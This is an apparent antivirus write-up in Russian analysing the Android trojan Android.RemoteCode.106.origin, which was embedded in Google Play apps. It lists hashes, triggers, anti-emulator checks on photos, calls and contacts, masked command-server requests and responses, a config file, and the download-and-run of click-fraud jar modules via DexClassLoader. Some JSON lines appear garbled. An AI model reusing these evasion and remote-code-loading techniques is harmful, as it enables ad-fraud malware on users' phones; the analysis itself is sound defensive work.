| SHA1: | Имя программного пакета | Версия приложения с троянцем |
|---|---|---|
| 0e5e5cfbeb05fe27f59c8aa15bfca3556cbe7005 | com.alkalinelabs.bandgame | 1.47 |
| 29bbbcdbc888a7ff7e7bfaa96b3815a604b903fc | com.gamehero.sweetbakerymatch3saga | 3.0 |
| 287aea9ca36ace404372f98e222ab2d509e49019 | com.gamehero.cartoonracoon | 1.0.2 |
| 1cd9537c376d139f91b3628e01c7d0e2079ba2e5 | com.antee.biblicalquiz | 1.8 |
| 3f50c348c94a53164d0bd241773c9b90aee3a85f | en.biblequiz.pro | 2.4 |
| c916a6fa36b76bd0af8b0a181d3f349fd086c19d | com.justfclean.fustc | 1.0 |
| d88f7805a619f108b55921269e94c31fbdf1d4f5 | com.getrewarded | 1.9 |
| 8f9587da8dac4befc9617817ded31297a70e9328 | com.alkalinelabs.learntosing | 1.2 |
| 78dec5a8ff19c27211542ee7a251c3fb6f44df4a | com.mdroidapps.easybackup | v.4.9.15 |
Троянец для ОС Android, который может быть встроен в безобидные приложения. Несколько программ с Android.RemoteCode.106.origin были выявлены в каталоге Google Play.
Троянец запускается автоматически в следующих случаях:
- включение зараженного мобильного устройства (отслеживается системное событие android.intent.action.BOOT_COMPLETED);
- получение намерения MOBGUN_REPORT_INTENT, которое отправляется каждые 30 секунд с помощью класса AlarmManager. На устройствах с ОС Android 5.0 и выше запуск происходит каждые 30 секунд с помощью JobScheduler;
- старт приложения, в которое встроен Android.RemoteCode.106.origin.
Android.RemoteCode.106.origin не проявляет активности, если на зараженном устройстве отсутствует заданное число фотографий, контактов в телефонной книге и звонков в журнале вызовов. Например, для версии троянца из приложения Bible Trivia v1.8 (sha1: 1cd9537c376d139f91b3628e01c7d0e2079ba2e) на устройстве должно быть:
- не менее 10 фотографий;
- не менее 3 записей о звонках в журнале вызовов за последние 3 дня;
- не менее 10 контактов, имеющих телефонные номера.
Если при проверке указанные условия выполняются, Android.RemoteCode.106.origin передает на управляющий сервер запрос вида:
GET http://mobgun*********.com:443/sys/k/get/?pn=com.antee.biblicalquiz&sub=test_sub_id&pub=90154&aid=99d078094e1be3b9&av
HTTP/1.1 =16&v=11&b=Z2VuZXJpYw==&m=c2Rr
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: :443 mobgun*********.com
Connection: Keep-Alive
Accept-Encoding: gzip
В ответ он получает команду со списком веб-адресов, по которым ему необходимо перейти:
{
"result":true,
"k":[
{
"t":1,
"u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&payout=0.01
},
{
"t":2,
"u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&cnv_status=[TIME]&payout=0.01
},
{
{
"t":0,
"u":" }" http://download********.top/click.php?key=du7ww2dgf7uje503rvmd&pubid={pubid
}
]
}
После этого троянец пытается перейти по полученным ссылкам. В случае успешного перехода и получения ответа Android.RemoteCode.106.origin приступает к выполнению своего основного вредоносного функционала.
Троянец передает на сервер http://mobgun*********.com/sys/m/g/ запрос вида:
{
"v":11,
"ref":"02e1f7vtlfnbzac1",
"model":"sdk",
"pubId":"90154",
"subId":"test_sub_id",
"brand":"generic",
"pn":"com.antee.biblicalquiz",
"m":[
],
"aid":"99d078094e1be3b9",
"av":16
}
В ответ он получает команду, в которой указан список дополнительных модулей (x.awvw.Awvw – Android.Click.199.origin, x.wpp.Wpp – Android.Click.200.origin), а также файл конфигурации, которые необходимо загрузить с сервера:
{
"result":true,
"m":[
{
"t":1,
"n":"x.awvw.Awvw",
"h":"b42c215188486c7ed65341d2fdefda3b",
"u":"/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/"
},
{
"t":1,
"n":"x.wpp.Wpp",
"h":"ce77c3c4b33b0d078afdec6fbfc21093",
"u":"/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/"
},
{
"t":3,
"n":"config",
"h":"25507ab4013f1deafebf14487cebcb61",
"u":"/sys/m/l/e2a018b0-c3d5-40a6-ae44-4ef7bec205c3/"
}
],
"time":1510217665299
}
Конфигурационный файл троянца имеет следующий вид:
{
"debug":true,
"debugList":[
"76e5379d356d8156",
"644e08515fb7ab5",
"c6f19b3e796ea3fb",
"76e5379d356d8156",
"e946a5959a48945b"
],
"awvw":true,
"awvwUrl":"http://*.*.65.235:18011/sys/action/?t={TYPE}&pn={PACKAGENAME}&aid={ANDROIDID}&av={APIVERSION}&brand={B
}" RAND}&model={MODEL}&msg={MSG}&tid={TID}&sv={SOFTVERSION ,
"awvwTaskUrl":" " http://*.*.65.235:18080/sys/task/get/ ,
"awvwPingUrl":" " http://*.*.65.235:18011/sys/ping/ ,
"awvwMaxWorkers":3,
"awvwMaxAttempts":5,
"awvwAttemptDelay":30000,
"awvwDebug":false,
"awvwVisible":false,
"awvwVisible":false,
"awvwTouchable":false,
"glPingDelay":900000,
"awvwRefreshDelay":60000,
"awvwMaxNoRefresh":600000,
"awvwCookieDelay":30000,
"awvwPageFinishTime":15000,
"awvwClickTimeout":15000
}
Ссылка на загружаемые модули формируется следующим образом: имя хоста http://mobgun*********.com + строка u из полученного ответа от сервера.
- http://mobgun*********.com/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/ – для Android.Click.200.origin.
- http://mobgun*********.com/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/ – для Android.Click.199.origin.
Скачиваемые вредоносные компоненты представляют собой jar-файлы, которые после загрузки запускаются с использованием класса DexClassLoader.
